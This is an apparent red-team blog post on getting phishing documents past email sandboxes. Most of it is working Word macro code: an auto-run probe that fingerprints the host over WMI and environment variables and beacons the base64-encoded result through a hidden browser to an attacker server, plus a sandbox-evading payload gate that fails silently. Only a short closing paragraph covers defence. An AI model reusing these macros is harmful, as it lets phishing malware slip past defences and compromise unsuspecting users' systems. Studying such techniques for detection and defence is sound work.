I decided to mix things up a little bit and do a blog post on something a little different than the usual vulnerability research or CTF write-ups. The bulk of our day job is focused on performing long term external assessments on customer networks, so I thought it might be useful to others to do a post on some hurdles we have had to overcome recently with regard to phishing.

In our experience, phishing is probably responsible for somewhere around 80% of initial network access from external sources. Unfortunately this is due to poor user security training and a handful of other debatable reasons. To try to solve the overwhelming problem of click-happy users, IT administrators have begun installing appliances that detonate incoming emails and their macro-bearing attachments in a sandbox to determine whether they perform malicious activity. These devices have become quite effective at stopping suspicious emails from ever reaching users.

If you talk to anyone who has been working in security for any significant amount of time, they will tell you that offensive and defensive techniques each evolve as a direct result of advances in the other. In our scenario, the offensive tactic was emailing users documents carrying macros. In response, defensive tools were developed to sandbox those emails and identify malicious activity. The natural next step for the offense is a technique that renders the sandboxing useless.

Our team had reasonable success bypassing these devices using various tricks employed by modern malware, such as the ones described at https://threatpost.com/malware-evades-detection-with-novel-technique/120787/ and http://www.securityweek.com/dyre-banking-trojan-counts-processor-cores-detect-sandboxes. Realizing that this problem was only going to become more prevalent, we decided to take the idea behind those links one step further.

We chose to turn the function of these devices against them. Since they are built to execute whatever code reaches them inside a sandbox, we targeted the sandbox itself rather than the users behind it. We picked an arbitrary email address in the target domain, constructed a blatant phishing email of the kind the target would see often, and attached a macro that performs extensive enumeration of whatever system runs it: logical processor count, Word's recent-files count, hostname, username, domain and logon server, MAC and IP addresses, and the hardware manufacturer and model. The macro posts the results back to an attacker-controlled server. If the sandbox detonates the attachment, what comes back is a fingerprint of the sandbox, and the real phishing macro can then be gated to run only on systems that do not match it. The probe can be repeated as many times as the red teamer feels is necessary to learn which fields are stable across runs and to gain confidence in the results. An example enumeration macro is listed below.

[sourcecode language="vb"]
' Enumeration (probe) macro: collects a fingerprint of whatever host opens the
' document and posts it, base64-encoded, to an attacker-controlled server.

Function MakeModel()
    ' Manufacturer and model from WMI; virtual sandboxes usually give themselves away here.
    Dim retStr, strComputer, strQuery, objWMIService, colItems, objItem
    retStr = ""
    strComputer = "."
    strQuery = "SELECT * FROM Win32_ComputerSystem"
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colItems = objWMIService.ExecQuery(strQuery)
    For Each objItem In colItems
        retStr = objItem.Manufacturer
        retStr = retStr & "|" & objItem.Model
    Next
    MakeModel = retStr
End Function

Function EnvironVars()
    ' Hostname, user, domain and logon server straight from the environment block.
    Dim sHostname
    sHostname = Environ("computername") & "|" & Environ("username") & _
        "|" & Environ("userdomain") & "|" & Environ("LOGONSERVER")
    EnvironVars = sHostname
End Function

Function RecentFiles()
    ' Word's recent-files list; a freshly imaged sandbox typically has none.
    Dim wdApp
    Set wdApp = ActiveDocument.Application
    RecentFiles = wdApp.RecentFiles.Count
End Function

Function GetCores()
    ' One Win32_PerfFormattedData_PerfOS_Processor instance per logical processor
    ' plus a "_Total" instance; the caller subtracts one. Sandboxes are often single-core.
    Dim objWMI, cores, strQuery
    strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor"
    Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
    Set cores = objWMI.ExecQuery(strQuery, , 48)
    Set GetCores = cores
End Function

Function GetNetwork()
    ' MAC address and first IP address of every IP-enabled physical adapter,
    ' emitted as mac|ip pairs separated by "|".
    Dim retStr, strComputer, strQuery, objWMIService, colItems, ipItems
    Dim objItem, ipItem, strMacAddress, sysName
    retStr = ""
    strComputer = "."
    strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True"
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colItems = objWMIService.ExecQuery(strQuery)
    Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration")

    For Each objItem In colItems
        strMacAddress = objItem.MACAddress
        sysName = objItem.SystemName
        For Each ipItem In ipItems
            If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled Then
                If Len(retStr) > 0 Then retStr = retStr & "|"
                retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0)
                Exit For
            End If
        Next
    Next
    GetNetwork = retStr
End Function

Private Function Enc(ByVal strData As String) As String
    ' Base64-encode via MSXML. "bin.base64" is assembled with Chr() so the
    ' literal string does not appear in the macro text.
    Dim arrData() As Byte, objXML, objDocElem
    arrData = StrConv(strData, vbFromUnicode)

    Set objXML = CreateObject("MSXml2.DOMDocument")
    Set objDocElem = objXML.createElement("data")
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    objDocElem.nodeTypedValue = arrData
    ' MSXML wraps base64 output at 76 columns; strip the line breaks before
    ' the value is appended to a URL.
    Enc = Replace(Replace(objDocElem.Text, vbCr, ""), vbLf, "")

    Set objDocElem = Nothing
    Set objXML = Nothing
End Function

Private Function Dec(ByVal strData As String) As Byte()
    ' Inverse of Enc; used if the callback address is stored base64-encoded.
    Dim objXML, objDocElem
    Set objXML = CreateObject("MSXml2.DOMDocument")
    Set objDocElem = objXML.createElement("data")
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    objDocElem.Text = strData
    Dec = objDocElem.nodeTypedValue

    Set objDocElem = Nothing
    Set objXML = Nothing
End Function

Sub DoStuff(ByVal strData As String)
    ' Post the fingerprint by driving a hidden Internet Explorer instance to
    ' <address><base64 fingerprint>. Errors are swallowed so the document
    ' opens without any visible sign that the macro ran.
    Dim IE As Object, doc As Object, lnkOverRide As Object
    Dim address As String

    On Error GoTo ErrorHandler

    address = "http://127.0.0.1/"           ' attacker-controlled server (placeholder)
    'address = StrConv(Dec(address), 64)    ' alternative: keep the address base64-encoded and decode at run time

    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.navigate address & strData
    Do While IE.Busy: DoEvents: Loop
    Do While IE.ReadyState <> 4: DoEvents: Loop
    Set doc = IE.Document

    ' If IE stopped on its certificate-warning page (self-signed HTTPS on the
    ' callback host), click "Continue to this website" and wait again.
    Set lnkOverRide = doc.getElementById("overridelink")
    If Not lnkOverRide Is Nothing Then
        lnkOverRide.Click
        Do While IE.Busy: DoEvents: Loop
        Do While IE.ReadyState <> 4: DoEvents: Loop
    End If

    IE.Stop
    IE.Quit
    Exit Sub

ErrorHandler:
    On Error Resume Next
    If Not IE Is Nothing Then IE.Quit   ' do not leave a hidden iexplore.exe behind
End Sub

Sub AutoOpen()
    ' Runs when the document opens. Fields are "|"-delimited in this order:
    ' cores|recentfiles|computername|username|userdomain|logonserver|mac|ip...|manufacturer|model
    Dim retStr As String, cores, i, Length

    Set cores = GetCores
    Length = 0
    For Each i In cores
        Length = Length + 1
    Next

    retStr = CStr(Length - 1)            ' drop the "_Total" instance
    retStr = retStr & "|" & RecentFiles
    retStr = retStr & "|" & EnvironVars
    retStr = retStr & "|" & GetNetwork
    retStr = retStr & "|" & MakeModel
    retStr = Enc(retStr)

    DoStuff retStr
End Sub
[/sourcecode]
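The post describes the second half of the technique, the payload macro that refuses to run on the fingerprinted sandbox, but does not show it. The following is an added example written for this page, not code from the original post: a Word macro that rebuilds the same fingerprint fields the probe collects, compares them against the records the probe posted back from the sandbox, and proceeds only on a host that matches none of them. The names SANDBOX_RECORDS, HostFingerprint, MatchesRecord and IsKnownSandbox are this example's own, and the two records in SANDBOX_RECORDS are constructed placeholders in the probe's field order with the variable-length network block removed; substitute whatever your own probe actually returned.

```vb
Option Explicit

' Added example, not from the original post: payload macro gated on the
' fingerprint the probe recovered from the target's email sandbox.
' Record format (probe field order, network block removed):
'   cores|recentfiles|computername|username|userdomain|logonserver|manufacturer|model
' The two records below are constructed placeholders; replace them with what
' your own probe posted back. Multiple records are separated by ";".
Private Const SANDBOX_RECORDS As String = _
    "2|0|WIN-SANDBOX01|admin|WIN-SANDBOX01|\\WIN-SANDBOX01|VMware, Inc.|VMware Virtual Platform;" & _
    "1|0|DESKTOP-ANALYST|user|DESKTOP-ANALYST|\\DESKTOP-ANALYST|innotek GmbH|VirtualBox"

Private Function MakeModel() As String
    ' Manufacturer|Model, same source as the probe.
    Dim objWMI As Object, objItem As Object
    Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
    For Each objItem In objWMI.ExecQuery("SELECT Manufacturer, Model FROM Win32_ComputerSystem")
        MakeModel = objItem.Manufacturer & "|" & objItem.Model
    Next
End Function

Private Function CoreCount() As Long
    ' The number the probe derives from Win32_PerfFormattedData_PerfOS_Processor
    ' (instances minus "_Total"), read directly here instead.
    Dim objWMI As Object, objItem As Object
    Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
    For Each objItem In objWMI.ExecQuery("SELECT NumberOfLogicalProcessors FROM Win32_ComputerSystem")
        CoreCount = objItem.NumberOfLogicalProcessors
    Next
End Function

Public Function HostFingerprint() As String
    ' Same fields, same order and delimiter as SANDBOX_RECORDS.
    HostFingerprint = CStr(CoreCount()) & "|" & _
        CStr(ActiveDocument.Application.RecentFiles.Count) & "|" & _
        Environ("computername") & "|" & Environ("username") & "|" & _
        Environ("userdomain") & "|" & Environ("LOGONSERVER") & "|" & MakeModel()
End Function

Private Function MatchesRecord(ByVal hostRec As String, ByVal sandboxRec As String) As Boolean
    ' Compare only the fields that stayed constant across our probe runs:
    ' cores (0), username (3), userdomain (4), manufacturer (6), model (7).
    ' Recent-files count (1), hostname (2) and logon server (5) are left out
    ' because they can drift from one sandbox detonation to the next.
    Dim h() As String, s() As String, keyFields As Variant, i As Variant
    h = Split(hostRec, "|")
    s = Split(sandboxRec, "|")
    If UBound(h) <> UBound(s) Then Exit Function   ' malformed record: treat as no match
    keyFields = Array(0, 3, 4, 6, 7)
    For Each i In keyFields
        If LCase$(Trim$(h(i))) <> LCase$(Trim$(s(i))) Then Exit Function
    Next
    MatchesRecord = True
End Function

Public Function IsKnownSandbox(ByVal hostRec As String, ByVal records As String) As Boolean
    ' True if the host matches any one of the ";"-separated sandbox records.
    Dim rec As Variant
    For Each rec In Split(records, ";")
        If Len(Trim(rec)) > 0 Then
            If MatchesRecord(hostRec, CStr(rec)) Then
                IsKnownSandbox = True
                Exit Function
            End If
        End If
    Next
End Function

Sub AutoOpen()
    ' Fail closed and silent: an error dialog inside the sandbox is itself a
    ' tell, and it would surface the gate to an analyst.
    On Error GoTo Quiet
    If IsKnownSandbox(HostFingerprint(), SANDBOX_RECORDS) Then Exit Sub
    ' The real payload goes here. A message box is used while testing the gate
    ' on a known workstation, whose fingerprint should match no record.
    MsgBox "Gate passed: " & HostFingerprint()
Quiet:
End Sub
```

Two design points. Matching on a subset of fields rather than the whole record is deliberate: the probe is run several times precisely to learn which values the sandbox keeps constant, and those are the ones worth keying on, while a field that changes between detonations (a different hostname or recent-files count) would let the sandbox slip through an exact-match gate. And the gate fails closed: any runtime error before the comparison exits without running the payload, since a visible error box in the sandbox is exactly the kind of behaviour the appliance is watching for.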

We believe this technique to be reasonably effective against most modern email sandboxes. The mitigations we can see are randomizing what the sandbox reports about itself, or blocking the outbound connection that carries the results. The first would be quite difficult, since the enumeration script can poll any number of identifying pieces of data and every one of them would have to be randomized consistently. The second is also difficult, since the purpose of the sandbox is to let the malware run, and talk, in order to profile it. What the defender does get for free is that the probe itself is observable behaviour: a macro that enumerates the host over WMI and then beacons out is a pattern worth alerting on even where it cannot be blocked. For now, our team will save a few more hours creating phishing content and a few more dollars buying phishing domains. The ball is back in your court, defense.